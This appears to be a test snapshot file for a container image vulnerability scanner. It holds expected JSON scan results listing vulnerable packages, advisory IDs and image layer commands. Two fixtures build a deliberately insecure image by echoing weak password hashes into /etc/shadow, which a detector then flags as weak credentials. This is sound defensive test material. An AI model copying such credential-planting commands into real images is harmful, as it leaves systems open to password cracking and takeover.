[ { "package": { "name": "idna", "version": "2.7", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 1, "vulnerabilities": [ "PYSEC-2024-60", "GHSA-jjg7-2v4v-x38h" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "pip", "version": "23.0.1", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-228", "GHSA-4xh5-x5gv-qwph", "GHSA-6vgw-5pg2-w6jp", "GHSA-mq26-g339-26xf" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/requests-2.20.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "requests", "version": "2.20.0", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-74", "GHSA-9hjg-9r4m-mvj7", "GHSA-9wx4-h78v-vm56", "GHSA-j8r2-6x86-q33q" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "setuptools", "version": "58.1.0", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2022-43012", "PYSEC-2025-49", "GHSA-5rjg-fvgr-3xxf", "GHSA-cx63-2mw6-8hw5", "GHSA-r9hx-vwmv-q579" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/urllib3-1.24.3.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "urllib3", "version": "1.24.3", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 9, "vulnerabilities": [ "PYSEC-2020-148", "PYSEC-2021-108", "PYSEC-2023-192", "PYSEC-2023-212", "GHSA-2xpw-w6gg-jr37", "GHSA-34jh-p97f-mpxf", "GHSA-38jv-5279-wg99", "GHSA-g4mx-q9vg-27p4", "GHSA-gm62-xv2j-4w53", "GHSA-pq67-6m6q-mj2v", "GHSA-v845-jxx5-vc9f", "GHSA-wqvq-5m8c-6g24" ] } ] }, { "source": { "path": 
"/usr/local/lib/python3.9/site-packages/werkzeug-3.1.4.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "werkzeug", "version": "3.1.4", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 2, "vulnerabilities": [ "GHSA-29vq-49wr-vm6x", "GHSA-87hc-h4r5-73f7" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "wheel", "version": "0.40.0", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 1, "vulnerabilities": [ "GHSA-8rrh-rw8j-w5fx" ] } ] }, { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "debian-archive-keyring", "os_package_name": "debian-archive-keyring", "version": "2019.1+deb10u1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3482-1" ] }, { "package": { "name": "util-linux", "os_package_name": "fdisk", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc-bin", "version": "2.28-10+deb10u2", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3850-1", "DLA-3807-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.28-10+deb10u2", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3850-1", "DLA-3807-1" ] }, { "package": { "name": "expat", "os_package_name": "libexpat1", "version": "2.2.6-2+deb10u6", "ecosystem": "Debian:10", "image_origin_details": { "index": 7 } }, "groups": 
1, "vulnerabilities": [ "DLA-3783-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libfdisk1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.6.7-4+deb10u10", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3660-1", "DLA-3740-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libsmartcols1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl1.1", "version": "1.1.1n-0+deb10u5", "ecosystem": "Debian:10", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "DLA-3530-1" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "241-7~deb10u9", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3474-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libtinfo6", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "systemd", "os_package_name": "libudev1", "version": "241-7~deb10u9", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, 
"groups": 1, "vulnerabilities": [ "DLA-3474-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "openssl", "os_package_name": "openssl", "version": "1.1.1n-0+deb10u5", "ecosystem": "Debian:10", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "DLA-3530-1" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.30+dfsg-6", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3755-1" ] }, { "package": { "name": "tzdata", "os_package_name": "tzdata", "version": "2021a-0+deb10u11", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3684-1", "DLA-3788-1" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Debian GNU/Linux 10 (buster)", "layer_metadata": [ { "diff_id": 
"sha256:...", "command": "ADD file:2818e508d01da218...", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"bash/"]", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "ENV PATH=/usr/local/bin:/...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV LANG=C.UTF-8", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV GPG_KEY=E3FF2839C048B...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_VERSION=3.9.17", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_PIP_VERSION=23...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_SETUPTOOLS_VER...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_GET_PIP_URL=ht...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_GET_PIP_SHA256...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "CMD [/"python3/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "WORKDIR /app", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "COPY ./python-fixture/req...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c pip instal...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "COPY python-fixture/main....", "is_empty": false, "base_image_index": 0 }, { "diff_id": 
"", "command": "CMD [/"python/" /"main.py/"]", "is_empty": true, "base_image_index": 0 } ], "base_images": [ {}, { "name": "python", "tags": null }, { "name": "debian", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages - 2] Scanning local image tarball "./testdata/test-python-full.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages - 1] { "results": [ { "source": { "path": "/app/rust_novuln_deprecated", "type": "artifact" }, "packages": [ { "package": { "name": "url", "version": "2.5.3", "ecosystem": "crates.io", "deprecated": true, "image_origin_details": { "index": 2 } } } ] }, { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "busybox", "os_package_name": "busybox-binsh", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.5.4-r0", "ecosystem": "Alpine:v3.22", "commit": "8f330e62bd41c2ac23dbd866fea36fb8e22f8422", "image_origin_details": { "index": 0 } }, "groups": 12, "vulnerabilities": [ "ALPINE-CVE-2025-11187", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-15469", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.5.4-r0", 
"ecosystem": "Alpine:v3.22", "commit": "8f330e62bd41c2ac23dbd866fea36fb8e22f8422", "image_origin_details": { "index": 0 } }, "groups": 12, "vulnerabilities": [ "ALPINE-CVE-2025-11187", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-15469", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.22", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD alpine-minirootfs-3.22.2-x86_64.tar.gz / # buildkit", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY /app/target/release/rust_novuln_deprecated /app/rust_novuln_deprecated # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages - 2] Scanning local image tarball "./testdata/test-image-with-deprecated.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary - 1] { "results": [ { "source": { "path": "/go/bin/ptf-1.4.0", "type": "artifact" }, "packages": [ { "package": { "name": "github.com/BurntSushi/toml", "version": "1.4.0", "ecosystem": "Go", "image_origin_details": { "index": 2 } } }, { "package": { "name": "stdlib", "version": "1.22.4", "ecosystem": "Go", "image_origin_details": { "index": 2 } }, 
"groups": 32, "vulnerabilities": [ "GO-2024-2963", "GO-2024-3105", "GO-2024-3106", "GO-2024-3107", "GO-2025-3373", "GO-2025-3420", "GO-2025-3447", "GO-2025-3563", "GO-2025-3750", "GO-2025-3751", "GO-2025-3849", "GO-2025-3956", "GO-2025-4006", "GO-2025-4007", "GO-2025-4008", "GO-2025-4009", "GO-2025-4010", "GO-2025-4011", "GO-2025-4012", "GO-2025-4013", "GO-2025-4014", "GO-2025-4015", "GO-2025-4155", "GO-2025-4175", "GO-2026-4337", "GO-2026-4340", "GO-2026-4341", "GO-2026-4342", "GO-2026-4403", "GO-2026-4601", "GO-2026-4602", "GO-2026-4603" ] }, { "package": { "name": "ptf", "version": "(devel)", "ecosystem": "Go", "image_origin_details": { "index": 2 } } } ] }, { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "alpine-baselayout", "os_package_name": "alpine-baselayout", "version": "3.6.5-r0", "ecosystem": "Alpine:v3.20", "commit": "66187892e05b03a41d08e9acabd19b7576a1c875", "image_origin_details": { "index": 0 } } }, { "package": { "name": "alpine-baselayout", "os_package_name": "alpine-baselayout-data", "version": "3.6.5-r0", "ecosystem": "Alpine:v3.20", "commit": "66187892e05b03a41d08e9acabd19b7576a1c875", "image_origin_details": { "index": 0 } } }, { "package": { "name": "alpine-keys", "os_package_name": "alpine-keys", "version": "2.4-r1", "ecosystem": "Alpine:v3.20", "commit": "aab68f8c9ab434a46710de8e12fb3206e2930a59", "image_origin_details": { "index": 0 } } }, { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.14.4-r0", "ecosystem": "Alpine:v3.20", "commit": "d435c805af8af4171438da3ec3429c094aac4c6e", "image_origin_details": { "index": 0 } } }, { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "busybox", 
"os_package_name": "busybox-binsh", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "ca-certificates", "os_package_name": "ca-certificates-bundle", "version": "20240226-r0", "ecosystem": "Alpine:v3.20", "commit": "56fb003da0adcea3b59373ef6a633d0c5bfef3ac", "image_origin_details": { "index": 0 } } }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.3.1-r0", "ecosystem": "Alpine:v3.20", "commit": "15cc530882e1e6f3dc8a77200ee8bd01cb98f53c", "image_origin_details": { "index": 0 } }, "groups": 18, "vulnerabilities": [ "ALPINE-CVE-2024-12797", "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9231", "ALPINE-CVE-2025-9232", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.3.1-r0", "ecosystem": "Alpine:v3.20", "commit": "15cc530882e1e6f3dc8a77200ee8bd01cb98f53c", "image_origin_details": { "index": 0 } }, "groups": 18, "vulnerabilities": [ "ALPINE-CVE-2024-12797", "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9231", "ALPINE-CVE-2025-9232", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "musl", "os_package_name": "musl", "version": "1.2.5-r0", 
"ecosystem": "Alpine:v3.20", "commit": "4fe5bdbe47b100daa6380f81c4c8ea3f99b61362", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2025-26519" ] }, { "package": { "name": "musl", "os_package_name": "musl-utils", "version": "1.2.5-r0", "ecosystem": "Alpine:v3.20", "commit": "4fe5bdbe47b100daa6380f81c4c8ea3f99b61362", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2025-26519" ] }, { "package": { "name": "pax-utils", "os_package_name": "scanelf", "version": "1.3.7-r2", "ecosystem": "Alpine:v3.20", "commit": "e65a4f2d0470e70d862ef2b5c412ecf2cb9ad0a6", "image_origin_details": { "index": 0 } } }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "zlib", "os_package_name": "zlib", "version": "1.3.1-r1", "ecosystem": "Alpine:v3.20", "commit": "fad2d175bd85eb4c5566765375392a7394dfbcf2", "image_origin_details": { "index": 0 } } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.20", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD file:33ebe56b967747a97dcec01bc2559962bee8823686c9739d26be060381bbb3ca in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY /work/ptf-1.4.0 /go/bin/ # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary - 2] Scanning local image tarball "./testdata/test-go-binary.tar" --- 
[TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2021-36159" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:\n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:\nuser-bcrypt\n" }, "Plugins": [ "weakcredentials/etcshadow" ], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' \u003e\u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' \u003e\u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, {
"name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset - 2] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2021-36159" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. 
These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:\n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:\nuser-bcrypt\n" }, "Plugins": [ "weakcredentials/etcshadow" ], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' \u003e\u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' \u003e\u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled - 2] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package":
{ "name": "busybox", "os_package_name": "busybox-binsh", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.1.4-r5", "ecosystem": "Alpine:v3.19", "commit": "b784a22cad0c452586b438cb7a597d846fc09ff4", "image_origin_details": { "index": 0 } }, "groups": 9, "vulnerabilities": [ "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-2511", "ALPINE-CVE-2024-4603", "ALPINE-CVE-2024-4741", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9232" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.1.4-r5", "ecosystem": "Alpine:v3.19", "commit": "b784a22cad0c452586b438cb7a597d846fc09ff4", "image_origin_details": { "index": 0 } }, "groups": 9, "vulnerabilities": [ "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-2511", "ALPINE-CVE-2024-4603", "ALPINE-CVE-2024-4741", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9232" ] }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.36.1-r15", "ecosystem": "Alpine:v3.19", "commit": "d1b6f274f29076967826e0ecf6ebcaa5d360272f", "image_origin_details": { "index": 0 } }, "groups": 6, "vulnerabilities": [ "ALPINE-CVE-2023-42363", "ALPINE-CVE-2023-42364", "ALPINE-CVE-2023-42365", "ALPINE-CVE-2023-42366", "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] } ] }, { "source": { "path": "/prod/app/node_modules/.package-lock.json", "type": "artifact" }, "packages": [ { "package": { "name": "cryo", "version": "0.0.6", "ecosystem": "npm", "image_origin_details": { "index": 14 } }, "groups": 1, "vulnerabilities": [ 
"GHSA-38f5-ghc2-fcmv" ] }, { "package": { "name": "minimist", "version": "0.0.8", "ecosystem": "npm", "image_origin_details": { "index": 13 } }, "groups": 2, "vulnerabilities": [ "GHSA-vh95-rmgr-6w4m", "GHSA-xvch-5gv4-984h" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.19", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD file:37a76ec18f988775...", "is_empty": false, "base_image_index": 4 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 3 }, { "diff_id": "", "command": "ENV NODE_VERSION=20.11.1", "is_empty": true, "base_image_index": 2 }, { "diff_id": "sha256:...", "command": "RUN /0addgroup -g 1000 no...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV YARN_VERSION=1.22.19", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /0apk add --no-cache ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY file:4d192565a7220e1...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENTRYPOINT [/"docker-entry...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "CMD [/"node/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ARG MANAGER_VERSION=10.2.4", "is_empty": true, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "WORKDIR /prod/app", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", 